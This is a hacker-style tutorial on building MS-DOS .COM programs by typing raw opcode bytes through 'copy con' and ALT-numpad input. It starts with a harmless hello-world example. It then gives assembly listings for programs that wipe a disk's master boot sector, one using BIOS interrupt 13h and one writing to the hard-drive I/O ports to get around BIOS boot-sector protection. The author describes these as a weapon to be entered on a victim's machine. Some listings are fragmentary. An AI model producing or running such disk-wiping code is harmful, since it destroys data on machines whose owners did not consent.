Programming in extreme conditions
by Alexey Kalmykov (aka B52)
What are 'extreme conditions'? You are sitting in front of a computer with only MS-DOS installed, without any compilers, hex editors, shells or debuggers, and you need to recover lost data, delete a virus, or write a new one. These are extreme conditions. Most programmers won't be able to do anything, and most administrators think that such a computer is 100% secure.
But this won't stop the real hacker ...
I have chosen pure MS-DOS as the operating system to program for, because some versions of Windows contain many things that make this task easier (e.g. Windows 98 has a built-in browser with VBScript and JavaScript interpreters, so you can easily write a hex editor and more).
This article will be interesting both for beginners and for experienced hackers. I also recommend it to programmers, administrators, and anybody who wants to feel the hacking spirit, which is now disappearing with the previous generation of hackers.
To read and understand this you will need at least the following: knowledge of assembler and experience working with MS-DOS. You will also need a list of x86 instruction opcodes (you can find it here on Elf Qrin Hacking Labs), an ASCII table, and a lot of free time.
First of all, we need some kind of text editor. But the administrator removed EVERYTHING that could help us. There is only one thing that distinguishes a good hacker from any other hacker: deep knowledge of everything he works with. If he works with DOS, he knows everything about it. There is an undocumented function that opens a tiny text editor, but that's enough. Enter this DOS command:
C:\>copy con test.com
(con stands for "console")
This starts the text editor. This is our instrument. But we still don't know how to write binaries.
If you look at the official MS-DOS manual, you'll find the answer: using the ALT key and the numeric keypad you can enter arbitrary bytes, which means you can create binaries.
First of all, check that NUM LOCK is on. Now hold ALT, type 195 on the numeric keypad, and release ALT. To save the file and exit, press CTRL-Z and hit Enter. Now run it.
It doesn't do anything, but it doesn't hang the system either. If you disassemble it you will find that test.com consists of only one instruction, RETN. As you already guessed, the opcode of RETN is 0xC3, which is 195 in decimal.
Well, that was easy. Now try to enter this:
ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$
Then press CTRL-Z and hit Enter. It is clear that this program prints "Hi,world!". Let's disassemble it:
49E0:0100 B4 09 mov ah,9
49E0:0102 BA 0109 mov dx,offset data_1 ;
49E0:0105 CD 21 int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
49E0:0107 C3 retn
49E0:0108 20 db 20h
49E0:0109 48 69 20 21 21 21 data_1 db 'Hi,world!$' ; xref 49E0:0102
I hope you know about the reversed byte order in a machine word (little endian: ALT-09 ALT-01 gives dx = 0x0109). Also, to show the beauty of this method, I used the symbol '!' (0x21) to call interrupt 0x21. So knowing ASCII codes can make your life easier. But why do we need this symbol (20h == ALT-32 == " ") at 49E0:0108?
This is the main problem of this method. Using ALT and the numeric keypad we cannot enter some bytes. Here is a list of them:
You will need to avoid these bytes. If you look at the code, you'll see that the real offset of the string would be 0x108. After adding a padding byte the offset became 0x109. Actually there is a more elegant way to do it:
These two variants are the same size (dec dx is also 1 byte), so choose
whichever suits you best.
One of the main problems is finding the offsets of variables and labels. You can write the program on paper, giving the variables symbolic names, and when the program is ready it will be easy to find the necessary offsets and addresses.
Another possibility is to declare all variables before their use:
jmp short $+20
mov dx,0x100+2+2 ; 0x100 - the base address, 2 - length of
                 ; mov ah,9, 2 - length of jmp
jmp short $+20 jumps to 20 bytes past its own start, which leaves room for the string. This method can also be used for labels.
I think you are tired of this theory and feel ready to see the method at work? As an illustration we will try to create a program that erases the boot sector. Attention! Using this program to destroy information is a crime. You should use it only for experimental purposes.
First of all, let's write it in assembler:
B80103 mov ax,00301
B90100 mov cx,00001
BA8000 mov dx,00080
CD13 int 013
As you can see, we have one #0, one #3 and one #19. Let's modify the program to avoid them:
call dword ptr [bx]
It's quite a hard example. Assembler programming and interrupts are not really the subject of this article; I can only refer you to the other references that you can easily find on the Internet.
That's all: enter this on the victim's machine and you have a powerful weapon. I recommend using it very carefully.
Fortunately (or unfortunately, depending on the reader's orientation), the BIOS has boot-sector write protection (sometimes called "Virus warning"). It will block any attempt to modify the master boot sector. What's more, special software can be installed: for example, running this program under Windows 98 will have no effect. But we can still work with the hard drive I/O ports at a low level.
Here is an example of a program that will erase the master boot sector through the hard drive I/O ports:
mov dx, 1F2h
mov al, 10100000b
lea si, Buffer
mov dx, 1F0h
mov cx, 513
I don't know any popular protection that can track and block that program. However, this does not apply to Windows NT: that OS won't allow a program without the necessary privileges to work with ports; it will even close the application's window!
Preparing this example for entry with ALT and optimizing its size I leave as an exercise for the reader.
It's not easy. All this requires a lot of experience and talent, but it gives you incredible power over the machine. I hope you won't be using this power for destruction, and I also hope this article will be a step "back to the real spirit of hacking".